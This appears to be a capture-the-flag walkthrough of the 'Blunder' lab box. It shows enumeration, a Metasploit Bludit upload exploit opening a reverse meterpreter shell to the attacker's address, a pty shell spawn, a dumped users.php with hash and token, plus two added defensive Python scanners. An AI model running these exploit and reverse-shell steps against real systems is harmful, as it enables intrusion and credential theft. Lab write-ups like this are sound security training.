Blunder
Enumeration
nmap
$ nmap -sC -sV -oN nmap.txt 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 21:56 BST
Nmap scan report for 10.10.10.191
Host is up (0.066s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds
Apache httpd 2.4.41
dirsearch
$ ./dirsearch.py -u 10.10.10.191 -e *
[21:28:51] 200 - 7KB - /0
[21:28:56] 200 - 3KB - /about
[21:28:58] 301 - 0B - /admin -> http://10.10.10.191/admin/
[21:29:00] 200 - 2KB - /admin/
[21:29:00] 200 - 2KB - /admin/.config
[21:29:00] 200 - 2KB - /admin/?/login
...
...
...
[21:29:03] 200 - 2KB - /admin/web/
[21:29:03] 200 - 2KB - /admin/user_count.txt
[21:29:03] 200 - 2KB - /admin/uploads.php
[21:29:31] 301 - 0B - /domcfg.nsf/?open -> http://10.10.10.191/domcfg.nsf
[21:29:42] 200 - 30B - /install.php
[21:29:45] 200 - 1KB - /LICENSE
[21:30:03] 200 - 3KB - /README.md
[21:30:04] 200 - 22B - /robots.txt
wfuzz
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000003519: 200 1 L 4 W 22 Ch "robots"
000004125: 200 4 L 23 W 118 Ch "todo"
Potential username: fergus
After some extensive enumeration, the only useful information found was the "todo.txt" file, which contains a possible username ("fergus").
Creating wordlist with cewl
$ cewl -w wordlists.txt -d 10 -m 1 10.10.10.191/
Bruteforcing login credentials
Exploitation
Metasploit
msf5 > use exploit/linux/http/bludit_upload_images_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > show options
Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.17.168   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.189
lhost => 10.10.14.189
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.189:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading BamMBogTOe.png...
[*] Uploading .htaccess...
[*] Executing BamMBogTOe.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.189:4444 -> 10.10.10.191:43256) at 2020-08-16 22:46:40 +0100
[+] Deleted .htaccess
meterpreter > ls
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-08-16 22:52:22 +0100 thumbnails
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-05-26 09:29:29 +0100 hugo
40755/rwxr-xr-x 4096 dir 2020-04-28 12:13:35 +0100 shaun
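The module above gained execution by uploading an image together with an .htaccess into the CMS's bl-content/tmp directory and then requesting the image. As an added defensive check (my own example, not code from this writeup, Metasploit or Bludit), the scanner below walks an upload directory and flags .htaccess files, files whose image extension does not match their leading bytes, and files carrying a PHP open tag; the directory layout and file contents are a constructed fixture.

```python
import os
import tempfile

# Leading bytes expected for the image extensions an upload form usually accepts.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
         ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}
PHP_TAGS = (b"<?php", b"<?=")

def inspect_file(path):
    """Return the reasons a file looks suspicious (empty list means clean)."""
    name = os.path.basename(path)
    if name == ".htaccess":
        # Per-directory config inside an upload dir can change how files are served.
        return ["htaccess inside upload directory"]
    ext = os.path.splitext(name)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read(64 * 1024)  # header plus enough body to spot embedded code
    reasons = []
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        reasons.append(f"{ext} without matching magic bytes")
    if any(tag in data for tag in PHP_TAGS):
        reasons.append("PHP open tag in upload")
    return reasons

def scan_upload_dir(root):
    """Walk an upload tree; map relative path -> reasons for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reasons = inspect_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def build_sample_dir():
    """Constructed fixture resembling bl-content/tmp right after the upload step."""
    root = tempfile.mkdtemp(prefix="bludit-tmp-")
    os.makedirs(os.path.join(root, "thumbnails"))
    samples = {
        "thumbnails/real.png": MAGIC[".png"] + b"\x00" * 16,  # genuine image header
        "BamMBogTOe.png": b"<?php /* constructed stand-in, not a payload */ ?>",
        ".htaccess": b"# constructed stand-in\n",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root
```

The module cleaned up its .htaccess after use and the tmp listing afterwards shows only thumbnails, so a check like this belongs in a file-change monitor or scheduled job rather than a one-off run after the fact.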
PrivEsc
meterpreter > shell
Process 3417 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/$ ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
www-data@blunder:/$ cd var
www-data@blunder:/var$ ls
backups crash local log metrics run spool www
cache lib lock mail opt snap tmp
www-data@blunder:/var$ cd www
www-data@blunder:/var/www$ ls
bludit-3.10.0a bludit-3.9.2 html
www-data@blunder:/var/www$ cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
LICENSE bl-content bl-languages bl-themes install.php
README.md bl-kernel bl-plugins index.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
databases pages tmp uploads workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
categories.php plugins site.php tags.php
pages.php security.php syslog.php users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
User: Hugo Password hash: faca404fd5c0a31cf1897b823c695c85cffeb98d
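The users.php above is Bludit's flat-file user database: one PHP guard line followed by JSON. As an added example (my own code, not from this writeup or from Bludit), the parser below strips the guard, loads the accounts and reports which stored values are credential material a defender must treat as exposed once the file is readable; the sample is a constructed copy of the dump above and the function names are mine.

```python
import json
import re

# The line Bludit writes first in every bl-content/databases/*.php file.
GUARD = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>"
HEX40 = re.compile(r"^[0-9a-f]{40}$")  # length of a SHA-1 digest in hex

# Constructed copy of the users.php structure dumped above (values taken from the dump).
SAMPLE_USERS_PHP = GUARD + """
{
  "admin": {
    "nickname": "Hugo",
    "role": "User",
    "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
    "tokenRemember": "",
    "tokenAuth": "b380cb62057e9da47afce66b4615107d",
    "tokenAuthTTL": "2009-03-15 14:00"
  }
}
"""

def has_guard(text):
    """True if the first line is the PHP guard that keeps the JSON off the web."""
    return text.partition("\n")[0].strip() == GUARD

def load_users_php(text):
    """Strip the guard line and parse the JSON body into a dict of accounts."""
    if not has_guard(text):
        raise ValueError("guard line missing: not a Bludit database file")
    return json.loads(text.partition("\n")[2])

def audit_users(users):
    """Return {account: [findings]} listing the credential material each entry holds."""
    report = {}
    for account, u in users.items():
        issues = []
        if HEX40.match(u.get("password", "")) and "salt" not in u:
            issues.append("password is a 40-hex digest with no salt field beside it")
        if u.get("tokenAuth"):
            issues.append("tokenAuth stored in clear: a second credential besides the password")
        if u.get("tokenRemember"):
            issues.append("tokenRemember set: a persistent-login token is live")
        if issues:
            report[account] = issues
    return report
```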
Getting user.txt
Getting root.txt